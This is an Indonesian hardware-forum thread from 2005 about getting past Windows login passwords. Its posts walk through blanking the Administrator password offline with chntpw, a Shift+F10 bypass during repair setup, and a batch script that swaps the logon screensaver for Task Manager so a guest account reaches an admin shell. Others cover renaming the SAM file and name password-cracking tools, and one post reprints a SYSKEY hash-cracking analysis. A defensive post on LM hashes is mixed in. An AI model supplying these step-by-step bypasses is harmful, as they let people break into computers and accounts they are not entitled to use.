Oprek PC Menu
Facebook Fans Page
Oprek PC Ads
OprekPC.com Forum Index
  Modifikasi - Tweak - Overclock      Search      Memberlist      Album
  · Log in Register · Profile · Log in to check your private messages · Usergroups  
 Announcement 
Saat ini Anda sudah bisa menikmati layanan RSS Feed di forum OprekPC. Selamat bergabung dengan kami melalui offline mailing news.

Previous topic «» Next topic
Password Reset....how to...???...HOT UPDATED
Author Message
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Thu May 05, 2005 5:30 pm   Password Reset....how to...???...HOT UPDATED

pertama yg dibutuhkan adl :

1.http://home.eunet.no/%7Epnordahl/ntpasswd/bd050303.zip > utk membuat bootdisk image

2.http://home.eunet.no/%7Epnordahl/ntpasswd/sc050303.zip > utk bootdisk image yg dipakai pd Hdd SCSI

3.http://home.eunet.no/%7Epnordahl/ntpasswd/cd050303.zip > utk membuat CD Image.

bbrp hal yg kudu diperhatikan disini sebelumnya adl:
1.file ato folder yg terenkripsi akan tidak bisa dibuka (EFS) dgn password yg baru !!!
2.kesalahan pd penghapusan file SAM akan menyebabkan hilangnya acces boot pd OS,utk itu anda bisa backup dulu NTLDR dan NTDETECT dan bisa di kopi kan ulang bila masalah tersebut timbul...

sebelum dimulai ada baiknya baca2 dulu pd

http://home.eunet.no/%7Epnordahl/ntpasswd/faq.html

http://home.eunet.no/%7Epnordahl/ntpasswd/

ok.anggap saja smua sdh terdonload dan terekstrak pd disket/cd dan kita mulai meload pd "target" dan pd tampilan akan timbul...spt ini,

OVERVIEW:
1.Disk select,menyatakan disk yg ada system windows terinstal,scr optional kadang dibutuhkan driver khusus utk mengakses disk tersebut,ini terjd pd disk SATA dan bbrp model SCSI disk,mk jangan lupa utk membawa disket driver kontroller disk tersebut.
2.PATH,dimana file system terinstal pd disk.
3.Password reset dan registry editor
4.writte back to disk (anda akan diminta konfirm ini pd akhir aplikasi)

JGN PANIK ! tanpa memilih pun anda akan dibawa pd "default" dr aplikasi ini yg bertanda [...] mk cukup tekan "enter/reurn" utk memulai aksi...

1.DISK SELECT : dimana kah OS file system berada...?

=========================================================
. Step ONE: Select disk where the Windows installation is
=========================================================
Disks:
Disk /dev/ide/host0/bus0/target0/lun0/disc: 2147 MB, 2147483648 bytes
NT partitions found:
1 : /dev/ide/host0/bus0/target0/lun0/part1 2043MB Boot

Please select partition by number or
a = show all partitions, d = automatically load new disk drivers

m = manually load new disk drivers
l = relist NTFS/FAT partitions, q = quit
Select: [1]

-bbrp mesin hanya mengintegrasikan 1 disk utk OS mk anda bisa pilih 1 scr default.
-atau bila terinstal bbrp disk bisa pilih pd tabel "partition select"
-apabila tidak ada sistem disk yg terload,pd SCSI drive / ato pd RAID mode,pilih [/b]d pd driver select menu utk deteksi auto probe.
-apabila auto probe tidak bekerja,anda harus memilih
m utk melakukan.

2.MANUAL LOAD DRIVER DISK:

Select: [1] m
==== DISK DRIVER / SCSI DRIVER select ====
You may now insert or swap to the SCSI-drivers floppy
Press enter when done:
Found 1 floppy drives
Found only one floppy, using it..
Selected floppy #0
Mounting it..
Floppy selection done..
SCSI-drivers found on floppy:

1 BusLogic.o.gz
2 aic7xxx.o.gz
3 sym53c8xx.o.gz
[ ... ]

SCSI driver selection:
a - autoprobe for the driver (try all)
s - swap driver floppy
q - do not load more drivers
or enter the number of the desired driver

SCSI driver select: [q]

-select
a dan akan mencoba meload smua drivers dan akan berhenti setelah selesai loading driver.
-apabila anda sdh tau lokasi drive tsb,bisa langsung pilih nomor drive yg terdeteksi.

SCSI driver select: [q] a
[ BusLogic.o.gz ]
Using /tmp/scsi/BusLogic.o
PCI: Found IRQ 11 for device 00:10.0

[.... lots of driver / card info ...]

scsi0: *** BusLogic BT-958 Initialized Successfully ***
scsi0 : BusLogic BT-958
Vendor: FooInc Model: MegaDiskFoo Rev: 1.0
Type: Direct-Access ANSI SCSI revision: 02

[ ... ]

Attached scsi disk sda at scsi0, channel 0, id 0, lun 0
SCSI device sda: 8388608 512-byte hdwr sectors (4295 MB)
Partition check:
/dev/scsi/host0/bus0/target0/lun0: p1
Driver BusLogic.o.gz loaded and initialized.

-and bisa menghentikan process load dgn command
q utk mencoba meload bbrp driver
-apabila berhenti anda akan melihat pilihan spt diatas kembali.

***ok,sampai disini anda dianggap sdh nemuin "disk drive yg berisi OS windows" yg terinstal,tahap selanjutnya adl...***

3.PATH dan FILE SELECT: dimana OS system windows terinstal (target file !)

# winnt35/system32/config - Windows NT 3.51
# winnt/system32/config - Windows NT 4 and Windows 2000
# windows/system32/config - Windows XP/2003 and often Windows 2000 upgraded from Windows 98 or earlier.

ok,bila sdh mk secara default pilihan akan otomatis menemukan path file tersebut,disini cukup tekan enter aja,dan selanjutnya akan begini....

Selected 1
Mounting on /dev/ide/host0/bus0/target0/lun0/part1
NTFS volume version 3.1.
Filesystem is: NTFS

=========================================================
. Step TWO: Select PATH and registry files
=========================================================
What is the path to the registry directory? (relative to windows disk)
[windows/system32/config] :

-r-------- 1 0 0 262144 Jan 12 18:01 SAM
-r-------- 1 0 0 262144 Jan 12 18:01 SECURITY
-r-------- 1 0 0 262144 Jan 12 18:01 default
-r-------- 1 0 0 8912896 Jan 12 18:01 software
-r-------- 1 0 0 2359296 Jan 12 18:01 system
dr-x------ 1 0 0 4096 Sep 8 11:37 systemprofile
-r-------- 1 0 0 262144 Sep 8 11:53 userdiff

Select which part of registry to load, use predefined choices
or list the files with space as delimiter
1 - Password reset [sam system security]
2 - RecoveryConsole parameters [software]
q - quit - return to previous
[1] :

-apabila pilihan benar mk "spt diatas" akan tampak tp terkadang bervariasi pd bbrp pola disk yg ada.
-kemudian anda bisa memilih opsi apa yg akan anda lakukan (ketik nomor pilihan)
-pilihan password reset adl
default dan itu emang yg dicari bukan...?
-pilihan
2 sebenernya bisa dipakai utk recovery console pd winxp,w2k,w2k3 dgn melewati "administrator password"
-ato apabila anda mau mengedit registry,pilih hives yg akan anda load.

ok kita pilih
1 yaitu "password edit"....

4.PASSWORD RESET: siap utk sesuatu yg baru....???

=========================================================
. Step THREE: Password or registry edit
=========================================================
chntpw version 0.99.2 040105, (c) Petter N Hagen

[.. some file info here ..]

* SAM policy limits:
Failed logins before lockout is: 0
Minimum password length : 0
Password history count : 0

<>========<> chntpw Main Interactive Menu <>========<>

Loaded hives: <sam> <system> <security>

1 - Edit user data and passwords
2 - Syskey status & change
3 - RecoveryConsole settings
- - -
9 - Registry editor, now with full write support!
q - Quit (you will be asked if there is something to save)


What to do? [1] -> 1

===== chntpw Edit User Info & Passwords ====

RID: 01f4, Username: <Administrator>
RID: 01f5, Username: <Guest>, *disabled or locked*
RID: 03e8, Username: <HelpAssistant>, *disabled or locked*
RID: 03eb, Username: <pnh>, *disabled or locked*
RID: 03ea, Username: <SUPPORT_388945a0>, *disabled or locked*

Select: ! - quit, . - list users, 0x<RID> - User with RID (hex)
or simply enter the username to change: [Administrator]

-disini anda dihadapkan pd pilihan reset utk bbrp username yg ada pd OS windows,usser name akan terlihat bervariasi tergantung banyaknya input usser/group yg anda punya dlm satu OS.
-pilihan pd ussername amat sensitip! tp anda bisa pilih RID yg ada utk antisipasinya,bila kita pilih RID "01f4" mk pilihan akan jatuh pd "ADMINISTRATOR"....!!!
-tp jangan kawatir,sbb pilihan default utk ini adl "administrator" yg mana akan punya banyak akses "menuju jalan ke Roma"...iya kan...?

RID : 0500 [01f4]
Username: Administrator
fullname:
comment : Built-in account for administering the computer/domain

homedir :

Account bits: 0x0210 =
[ ] Disabled | [ ] Homedir req. | [ ] Passwd not req. |
[ ] Temp. duplicate | [X] Normal account | [ ] NMS account |
[ ] Domain trust ac | [ ] Wks trust act. | [ ] Srv trust act |
[X] Pwd don't expir | [ ] Auto lockout | [ ] (unknown 0x08) |
[ ] (unknown 0x10) | [ ] (unknown 0x20) | [ ] (unknown 0x40) |

Failed login count: 0, while max tries is: 0
Total login count: 3

* = blank the password (This may work better than setting a new password!)
Enter nothing to leave it unchanged
Please enter new password: *

-bbrp informasi akan ditampilkan,jg bila account administrator terlock anda akan diminta utk "meng-unlock" sblm aksi yg sesungguhnya terjd.pd bbrp kasus account tersebut di lock utk menghindari "hil-hil yg mustahal"...!!!

-
kita akan memilih blank password (*) utk seting ini,dan ini adl HIGHLY RECOMMENDED

Please enter new password: *
Blanking password!

Do you really wish to change it? (y/n) [n] y
Changed!

Select: ! - quit, . - list users, 0x - User with RID (hex)
or simply enter the username to change: [Administrator] !

-pilihan tersebut akan membawa kita ke menu selanjutnya...

<>========<> chntpw Main Interactive Menu <>========<>

Loaded hives:

1 - Edit user data and passwords
2 - Syskey status & change
3 - RecoveryConsole settings
- - -
9 - Registry editor, now with full write support!
q - Quit (you will be asked if there is something to save)

What to do? [1] -> q

5.WRITTING OUT THE CHANGE:...loginlah aku semau aku...!!!

Hives that have changed:
# Name
0 - OK

=========================================================
. Step FOUR: Writing back changes
=========================================================
About to write file(s) back! Do it? [n] : y

-pilihan terakhir,pd pilihan "
y mk penulisan password baru akan terjadi.

Writing sam

NOTE: A disk fixup will now be done.. it may take some time

Mounting volume... OK

Processing of $MFT and $MFTMirr completed successfully.

NTFS volume version is 3.1.

Setting required flags on partition... OK

Going to empty the journal ($LogFile)... OK

NTFS partition /dev/ide/host0/bus0/target0/lun0/part1 was processed successfully.
NOTE: Windows will run a diskcheck (chkdsk) on next boot.
NOTE: this is to ensure disk intergity after the changes

***** EDIT COMPLETE *****

You can try again if it somehow failed, or you selected wrong
New run? [n] : n

-selesailah sudah,mk skrg tinggal pake jurus "3 jari sakti" (ctrl+alt+del) utk mengakhiri dan REMOVE floppy atawa disk yg ada sebelumnya...bila login sdh mulai,pilih administrator dan
jangan isikan apapun sbg password[b] tekan aja "enter" mk...tuing...tuuuiiing....masuklah dikow pd windows mu tersayang...! n jangan lupa ama password lagi yah,atawa buat nakal yah....



OK...tips ini br saja datang dr seekor temen yg "katanya" ndak isa ngreset paswordnya dgn cara diatas...

1.set bios boot dr cd dan masukkan CD winxp
2.pilih opsi "repair"
3.biarkan apa adanya sampai setup melakukan "copying files"...
4.ssdh selesai mk akan ada pilihan reboot selama 15 detik...biarkan saja.
5.apabila logo "instaling device" muncul gunakan kesempatan itu sebaik mungkin,mk pencetlah "SHIFT + F10" yg mana INI ADL SEKURITI HOLE !!! setelah pencet maka akan muncul command prompt dan segera ketik kan "NUSRMGR.CPL" dan ketik "enter"...dan seketika itu anda akan membypass semua proses dan "MASUK LANGSUNG KE KONTROL PANEL" naaah ssdh itu mudah saja utk merubah,mendelete smua akoun2 yg ada disitu....
6.ssdh anda keluar dr proses epair tsb mk anda akan bebas login sbg apa saja,with or without passwords!!!

silahkan coba.....

Last edited by MAS on Sun Aug 28, 2005 6:12 pm; edited 1 time in total  
 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Tue May 10, 2005 9:46 pm   INI ADA LAGI ... !!!

1.masuk BIOS saat booting
2.di BIOS jam set waktu menjadi "00:00:00"
3.kemudian tekan CTRL + F9 dan enter....
4.kemudian .. akan muncul sebuah jendela yg nanyain passwords....
5.isikan aja "000000" (angka 0 6x!)
6.tekan enter
7.ketik "exit"
8.boot dgn nekan "F8" dan masuk mll "safe mode with networking"
9.kemudian...! tuuuing...tuuing masuklah lagi....ke windows dgn melewati pasword administrator sekuat apapun....

_________________
tested
 
 
zoolook 
baru ng-Oprek



Joined: 05 May 2005
Posts: 66
Location: down under
Posted: Thu May 12, 2005 2:41 am   

masih ada lagi kan...? trus gimana memproteksi hal2 tersebut ? tolong dibahas jg tentang itu (LMHash dan NTHash) jadi imbang gitu....

sorry kalo kebanyakan minta...

_________________
home of free
 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Sun Jun 05, 2005 2:36 pm   

ntar duluuu....ini ada lagi nih,namanya "overide usser agent" kek gini niih...

Login as limited acount, guest etc.. then open notepad.exe found in start/all program files/accessories and type the following:

cd\
cd\windows\system32
mkdir temphack
copy taskmgr.exe temphack\taskmgr.exe
copy logon.scr temphack\logon.scr
del logon.scr
rename taskmgr.exe logon.scr
exit

and then save it as a .bat file, for example x.bat not .txt. Then double click on the files you just saved and it should execute some commands that should replace your screensaver with the task manager. Now logoff your limited acount and wait for 10 to 15 mins, without touching the mouse or keyboard and wait for the screensaver to come on, which shall be the task manager. When it appears click on New Task and in the box type in regedit. This should open up the registry editor. Now go to the hive HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon and double click on AutoAdminLogon and set the value to 1 and click ok. Now refresh the registry and close it, and then restart the pc. Once the pc is restarted you should automatically logon as Administrator.
Now you must put your screensaver back to normal by opening notepad.exe and by typing the following:

cd\Windows\system32
del logon.scr
cd\Windows\system32\temphack
copy logon.scr C:\Windows\system32
copy taskmgr.exe C:\Windows\system32
exit

Now save it as restore.bat and execute it.

itu masuknya dr logon,alias capture pass admin yg tersimpan di screen...

_________________
tested
 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Sun Jun 05, 2005 2:46 pm   Anti Password Cracked...!!!

If your PC is susceptible to intrusion either through janitorial services, maintenance, or some other entity that has access to your PC physically, and you'd like to prevent a criminal with some knowledge from easily nabbing your password and using a program to unencrypt the stored copies, you might want to edit this registry entry:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\nolmhash

Set that entry to 1 to make sure that it doesn't leave a copy of your lmhash on your PC.

So you're saying to yourself, what the hell is an LMhash or an NThash:

The LMHash

The LMHash, also known as the Lan Manager hash, is technically speaking not a hash at all. It is computed as follows:

1. Convert all lower case characters in the password to upper case
2. Pad the password with NULL characters until it is exactly 14 characters long
3. Split the password into two 7 character chunks
4. Use each chunk separately as a DES key to encrypt a specific string
5. Concatenate the two cipher texts into a 128-bit string and store the result

As a result of the algorithm used to generate the LMHash, the hash is very easy to crack. First, even a password longer than 8 characters can be attacked in two discrete chunks. Second, the entire lower-case character set can be ignored. This means that most password cracking tools will start by cracking the LMHashes and then simply vary the alpha characters in the cracked password to generate the case-sensitive passwords. Note that in order to log on to a Windows 2000 system, whether remotely or locally, you will need to use the case-preserved password.

The NTHash

The NTHash is also known as the Unicode hash, because it supports the full Unicode character set. The NTHash is calculated by simply taking the plaintext password and generating an MD4 hash of it. The MD4 hash is then stored. The NTHash is much more resistant to brute force attacks than the LMHash. Brute forcing an NTHash takes several orders of magnitude longer than brute forcing the LMHash of the same password.
What constitutes a good password?

There are some general guidelines for what constitutes a reasonable password:

* Longer than 7 characters (otherwise the second half of the LMHash is an encryption using the NULL password
* Contains elements from at least three of the following four character sets
o Uppercase characters
o Lowercase characters
o Numbers
o Non-alpha numeric characters
* Does not contain any part of the users name, username, or any common word

This complexity is enforced via a password filter, and can be optionally required using group policy. Additionally, an administrator can customize the complexity requirements by writing a custom password filter. Such a filter could, for example, enforce that company names are not part of the password, or require additional complexity. For more information on how to write such a filter, refer to section on Password Filters in the Microsoft Windows Software Development Kit, at http://msdn.microsoft.com...rd_filters.asp.

However, most passwords like these are still easily cracked. There are several steps that can be taken to make a password harder to crack

* Use non-alpha numeric characters other than those from the "upper row." Upper row characters are those you type by holding down SHIFT and typing any number key. Most password crackers know that the upper row characters are the most common method to add entropy to a password and therefore start cracking with those.
* Use ALT characters. ALT characters are those that you type by holding down the ALT key (the FN+ALT keys on a laptop) and typing a three or four digit number on the numeric keypad (the numeric overlay keypad on a laptop). Most password crackers are not capable of testing the vast majority of ALT characters.
* Do not allow storage of the LMHash.

There are many ways to prevent storage of the LMHash. A system wide method will be discussed later in section Error! Reference source not found.. However, the creation of an LMHash can be controlled on a per-account basis by constructing the password in certain ways.

First, if the password is longer than 14 characters, the system is unable to generate an LMHash. In Windows 2000, passwords can be up to 127 characters.

Second, if the password contains certain ALT characters, the system will also not be able to generate an LMHash. This latter point is tricky, because while some ALT characters significantly strengthen the password by removing the LMHash, others significantly weaken it since they are converted into a normal upper-case letter prior to storage. There are many characters, however, which will strengthen the password. Table 1 lists all the characters below 1024 which cause the LMHash not to be generated.

Table 1 ALT characters which cause the LMHash to disappear
0128-0159 0306-0307 0312 0319-0320
0329-0331 0383 0385-0406 0408-0409
0411-0414 0418-0424 0426 0428-0429
0433-0437 0439-0447 0449-0450 0452-0460
0477 0480-0483 0494-0495 0497-0608
0610-0631 0633-0696 0699 0701-0707
0709 0711 0716 0718-0729
0731 0733-0767 0773-0775 0777
0779-0781 0783-0806 0808-0816 0819-0893
0895-0912 0914 0918-0919 0921-0927
0929-0930 0933 0935-0936 0938-0944
0947 0950-0955 0957-0959 0961-0962
0965 0967-1024

In many environments the LMHash cannot be disabled system wide. This could be the case, for example, in environments where the operating system is installed over the network by booting to a DOS disk. DOS does not support the NT hash algorithm and therefore requires the LMHash to be present. DOS also does not support ALT characters in the password. While we recommend that LMHashes be disabled system wide in all environments where it is feasible, the above techniques can be used to strengthen individual passwords in all environments.

We particularly recommend using ALT characters on sensitive accounts such as service accounts and administrative accounts. In general, these accounts need greater protection than ordinary user accounts, and the users using them should be willing to use very complicated passwords. One caveat is that using ALT characters in a password does break the recovery console, however. This should be kept in mind before setting up passwords with ALT characters.

Now that should clear it up like a visit to the pharmacist clears up mono.
:D

i've changed my LMhash just to be safe. And I will be encrypting some files and drives that I don't want anyone to see. So even if they do crack into your machine, without your NT password [NThash](much harder to crack than the LMhash), they cannot see your files.
:D



Vulnerability in Windows NT's SYSKEY encryption
SYSKEY does not fully protect the SAM from off-line attacks. Specifically, dictionary and brute-force password cracking are still possible, even when SYSKEY is enabled and the attacker is not in possession of the SystemKey.
All Windows NT 4.0 machines and pre-RC3 W2K machines with SYSKEY enabled.
SYSKEY is an optional Windows NT feature that was added in NT4.0 SP3. It adds further encryption to the password hashes in the SAM database. This encryption is meant to protect the SAM from 'off-line' attacks, where an attacker has gotten a copy of the SAM (e.g., by stealing a backup tape, repair disk, or the entire machine), but does not have the System Key. Without SYSKEY enabled, such an attacker would be able to directly recover all of the password hashes, and could then use them to authenticate on the network, or brute force them to obtain the plaintext passwords. Tools are currently available to do this. SYSKEY is supposed to defend against these attacks, but we have discovered that, due to implementation flaws, it falls well short.
How does SYSKEY change what is stored in the SAM? Let's look at an example. Here's a (partial) hex dump of the registry value
HKLM/SAM/SAM/Domains/Account/Users/000001F4/V: (before SYSKEY enabled)

000001f0: 6400 6f00 6d00 6100 6900 6e00 0102 0000 d.o.m.a.i.n.....
00000200: 0700 0000 0002 0000 0700 0000 ce28 297d .............()}
00000210: ede4 0fab 3a0f 6436 aff3 881f 0edb a361 ....:.d6.......a
00000220: 4fb6 c22a e367 e3ea bad8 807c 0edb a361 O..*.g.....|...a
00000230: 4fb6 c22a e367 e3ea bad8 807c 653c e4ff O..*.g.....|e<..
00000240: 45a2 1ee6 b2db 5d9f 09fe f2fd 8fb8 9576 E.....]........v
00000250: 81a5 70e6 c83d 0be2 a7f1 4fcb ce28 297d ..p..=....O..()}
00000260: ede4 0fab 3a0f 6436 aff3 881f 339e 652f ....:.d6....3.e/
00000270: be4f 2b9d 3a0f 6436 aff3 881f f42c 7909 .O+.:.d6.....,y.
00000280: 5604 6ea4 3a0f 6436 aff3 881f V.n.:.d6....

This is part of the SAM entry for the Administrator account on a test machine. The password hashes start at offset 0x20c. The first 16 bytes are the LMHash, the next 16 bytes are the NTHash, and the bytes after that are the hashes of the password history (including the current password), for both the NTHash and LMHash values. Actually, these are the obfuscated password hashes, although that's unimportant at this point. The data is roughly the real password hashes DES encrypted with the user's RID as the key. Code to undo the obfuscation can be found in pwdump.
So, we know:

obfusc. LMHash: ce28297dede40fab3a0f6436aff3881f
obfusc. NTHash: 0edba3614fb6c22ae367e3eabad8807c

After enabling SYSKEY, this changes to
HKLM/SAM/SAM/Domains/Account/Users/000001F4/V: (after SYSKEY enabled)

000001f0: 6400 6f00 6d00 6100 6900 6e00 0102 0000 d.o.m.a.i.n.....
00000200: 0700 0000 0002 0000 0700 0000 0100 0000 ................
00000210: 3e0e 0261 d2f5 f009 757c 7e7e 626a 78c1 >..a....u|~~bjx.
00000220: 0100 0000 fefd 887d 70a7 3d88 ac14 f9a2 .......}p.=.....
00000230: 7741 70a2 0100 0000 fefd 887d 70a7 3d88 wAp........}p.=.
00000240: ac14 f9a2 7741 70a2 96c6 794f 5959 0939 ....wAp...yOYY.9
00000250: c5a1 08d7 71e5 f60f 25e5 bc12 2a9f 1c4a ....q...%...*..J
00000260: 1b8c c152 6d04 6962 0100 0000 3e0e 0261 ...Rm.ib....>..a
00000270: d2f5 f009 757c 7e7e 626a 78c1 c064 f89f ....u|~~bjx..d..
00000280: a2b4 3c42 4d75 317e d7e8 8ced 5e71 506d ..<BMu1~....^qPm
00000290: fd3e 0208 e9be ae86 6506 aeb6 .>......e...



Now, aside from the insertion of '0100 0000' in front of each entry, we have the encrypted versions of the above.

enc. obfusc. LMHash: 3e0e0261d2f5f009757c7e7e626a78c1
enc. obfusc. NTHash: fefd887d70a73d88ac14f9a2774170a2

Encryption Analysis:
So, assuming all we have is the encrypted, obfuscated password hashes, what can we do? The more binary inclined may already see the punch line coming. It turns out that the hashes are encrypted with the same rc4 keystream, and consequently, that simply xoring them together will remove the encryption, and leave you with the xor of the obfuscated LM and NT hashes:

enc. obfusc. LMHash: 3e0e0261d2f5f009757c7e7e626a78c1
enc. obfusc. NTHash: xor fefd887d70a73d88ac14f9a2774170a2
--------------------------------
c0f38a1ca252cd81d96887dc152b0863

and

obfusc. LMHash: ce28297dede40fab3a0f6436aff3881f
obfusc. NTHash: xor 0edba3614fb6c22ae367e3eabad8807c
--------------------------------
c0f38a1ca252cd81d96887dc152b0863

Some work with a disassembler reveals the complete details of the encryption. For each user, the system uses a different key, which is computed by taking the MD5 sum of the global 128-bit encryption key (aka the password encryption key) concatenated with the user's 4-byte RID. However, this key is then used to rc4-encrypt the user's obfusc. LMHash, NTHash, and two password histories, all independently, using the same keystream.
Due to this flawed implementation, it is possible to conduct dictionary and brute force attacks against a SYSKEY protected SAM. An
initial attack would be as follows:

For each candidate password {
Compute LMHash(password) and NTHash(passwd)
Obfuscate the hashes as they are stored in the registry
Xor the two results
Compare with the xor of the SYSKEY encrypted versions of same
if they match, we've found the password.
}
Note that since the above calculation involves the user's RID, the attack must be done for one user at a time. However, this attack
can be improved upon by taking a closer look at the details.
Starting from the beginning, we know this:
NTHash is MD4 of the user's unicode password. LMHash is the DES encryption of "KGS!@#$%", using the password as the key. Since DES keys are only 56 bits, the password is broken into two 7 byte halves, then each half is used as a key. This leaves us with two 128 bit hashes, NTHash, and LMHash.
When stored in the registry, the hashes are further obfuscated by DES encrypting them, using a function of the user's RID as a key. Again, since the hashes are 128 bits, there are two DES encryptions done. The two halves are actually encrypted using different DES keys, but they're both functions of the RID. For details on this encryption, see Jeremy Allison's pwdump.

So, what ends up in the registry is:
des(k1,1st half lmhash), des(k2, 2nd half lmhash)

and
des(k1,1st half nthash), des(k2, 2nd half nthash)


where k1 and k2 are known functions of the user's RID.

Now, with syskey, there's a layer of rc4 encryption on top of that. Fortunately (for attackers), it reuses the keystream. So, stored in the registry is:
rc4 (k3, (des(k1,1st half lmhash), des(k2, 2nd half lmhash)))

and
rc4 (k3, (des(k1,1st half nthash), des(k2, 2nd half nthash)))


where k3 is unknown, and different for every user. Precisely, it's MD5 (<password encryption key concatenated with the user's RID).


Now, to attack, we xor out the rc4 encryption, giving:
des(k1,1st half lmhash), des(k2, 2nd half lmhash)

xored with
des(k1,1st half nthash), des(k2, 2nd half nthash)


or rewriting,
des(k1,1st half lmhash) ^ des(k1,1st half nthash)

and
des(k2,2nd half lmhash) ^ des(k2,2nd half nthash)


Again, we know k1 and k2.

Now, if we assume for the moment that the passwords are <= 7 characters, then we can proceed as follows:
since the LMHash is computed in halves, the second half will be fixed and known to us. Therefore, we can go through every user in the SAM and compute
des(k2,2nd half lmhash), take that, xor it with
des(k2,2nd half lmhash) ^ des(k2,2nd half nthash) to get
des(k2,2nd half nthash), then take that, and decrypt it with k2
to get 2nd half nthash. We can then look that up in our dictionary.
If we find a match, we can then verify that we have the correct password as in the first attack above. Since we've removed the user's RID through the above operations, we can conduct our attack against all users at once, for passwords which are <= 7 characters. Furthermore, we can precompute the dictionary; it will be good against all users on all machines.
What about passwords that are longer than 7 characters? Taking 8 character passwords as an example, we can still precompute a dictionary of NTHashes of 8 char passwords, and keep it sorted by the eighth character. Or perhaps think of it as 256 (or less if you're narrowing the search space) separate dictionaries. One for each 8th char. Now you can go through all users and try each of the 256 dictionaries, again computing the known 2nd half of lmhash and going from there. So we've reduced the strength of 8 char passwords to the strength of 1 char passwords modulo lots of space, and perhaps a large constant. This can be extended to longer passwords as well.
Note that it's also possible to attack the password histories, using the same technique.

_________________
tested
 
 
zoolook 
baru ng-Oprek



Joined: 05 May 2005
Posts: 66
Location: down under
Posted: Mon Jun 06, 2005 5:18 am   

edan ... !!! kumplit banget,madu dan racun yg menjadi satu....
_________________
home of free
 
 
freaxy
belajar ng-Oprek



Joined: 05 Apr 2005
Posts: 190
Location: C:\Documents and Settings\Freaxy
Posted: Mon Jun 06, 2005 12:01 pm   

Wihiii, nice Info neh....... :lol: :lol: , Thx yak.
_________________


 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Thu Jun 09, 2005 2:27 am   Binun....???

okeeeiii...gw dikomplain banyak orang krn kek na mingsih pada binun maenan shell,registry dan sembarang kalir laennya,klo susah2 ya make MiniPE aja....ada kok GUI langsung buat ngembat password.ada 2 tools disitu yaitu Password Renew dan SAMInside.
_________________
tested
 
 
andhee 
Oprek Rookie



Age: 35
Joined: 03 Jun 2005
Posts: 1327
Location: Jakarta
Posted: Thu Jun 09, 2005 2:53 am   

oh iya, kalo buka my document yg dienkripsi gimana caranya???

misal login gue di xp pake password n isi my doc cuma gue aja yg bisa buka, tiba2 nih hdd error, pengen retreive data gue yg ada di my doc, gimana cara bukanya???

_________________
 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Thu Jun 09, 2005 8:07 am   

itu retrieve nya secara offline ato online? offline maksudnya gini,klo folder tersebut di enkripsi dan diambil dgn menggunakan live cd mk folder tsb tidak akan bisa dibuka krn windows menggunakan enkripsi 128bit,jalan satu2nya adl memperbaiki MBR/partisi disknya dulu br bisa dibuka.klopun dgn cara paksa (brute forcing) bisa makan waktu lama,or anda bisa coba2 menggunakan SAMIndside utk "menebak" enkripsinya.
_________________
tested
 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Sun Aug 28, 2005 5:40 pm   

@andhee : caranya gini deh klo ndak mau bingung...

When you try to open a folder in Mcft Windows XP, you may receive the following error message, where Folder is the name of the folder that you cannot open:
Folder is not accessible. Access is denied.
CAUSE
This issue may occur if the folder that you cannot open was created on an NTFS file system volume by using a previous installation of Windows, and then installing Windows XP. This issue may occur although you enter the correct user name and password. This issue occurs because the security ID for the user has changed. Although you use the same user name and password, your security ID no longer matches the security ID of the owner of the folder that you cannot open.

For example, although you use the same user name and password, you may no longer have permission to open the folder after you complete the following steps:

RESOLUTION
To resolve this issue, you must turn off Simple File Sharing, and then take ownership of the folder:
1. Turn off Simple File Sharing:
a. Click Start, and then click My Computer.
b. On the Tools menu, click Folder Options, and then click the View tab.
c. Under Advanced Settings, click to clear the Use simple file sharing (Recommended) check box, and then click OK.
2. Right-click the folder that you want to take ownership of, and then click Properties.
3. Click the Security tab, and then click OK on the Security message, if one appears.
4. Click Advanced, and then click the Owner tab.
5. In the Name list, click your user name, Administrator if you are logged in as Administrator, or click the Administrators group.

If you want to take ownership of the contents of that folder, click to select the Replace owner on subcontainers and objects check box.
6. Click OK.

You may receive the following error message, where Folder is the name of the folder that you want to take ownership of:
You do not have permission to read the contents of directory Folder. Do you want to replace the directory permissions with permissions granting you Full Control? All permissions will be replaced if you press Yes.
7. Click Yes.
8. Click OK, and then reapply the permissions and security settings that you want for the folder and the folder contents.

_________________
tested
 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Sun Aug 28, 2005 5:41 pm   

oh ya ada satu cara lagi jebolin admin pass tanpa program apapun caranya gini deh....


It does not require any 3rd party software, simply a bootable floppy/cdrom. It involves renaming the WINDOWS user database file (SAM) effectively resetting all authentication.

To get access into a locked out system, simply follow these steps. It will work on Windows NT/2000/XP including server editions, becuase of the way authentication is handled by windows.

1> change the boot sequence of your system and set it to boot from the floppy/CD drive.

2> insert the Bootable floppy or CD and power on your system.

3> after the system boots from the drive and halts at a prompt, type the following

cd c: (or wherever your windows partition is located)
cd C:\WINNT\system32\config ( replace c:\WINNT with your windows folder)

now rename the SAM file. The file has no extension so your command can be something like this :

C:\WINNT\system32\config>ren sam sam.bak

Now the next time when you boot, all your passwords will be resetted to blank,as windows rebuilds the user database and the SAM file. Possibly all the users you have defined and any domain aaffiliations may be lost as well.

So use this at your own risk and preferebly on standalone machines which you want to gain access to.

_________________
tested
 
 
Andrean
baru ng-Oprek


Joined: 18 Sep 2005
Posts: 10
Posted: Wed Sep 21, 2005 7:45 pm   Password Reset tak berfungsi

Hello guys..
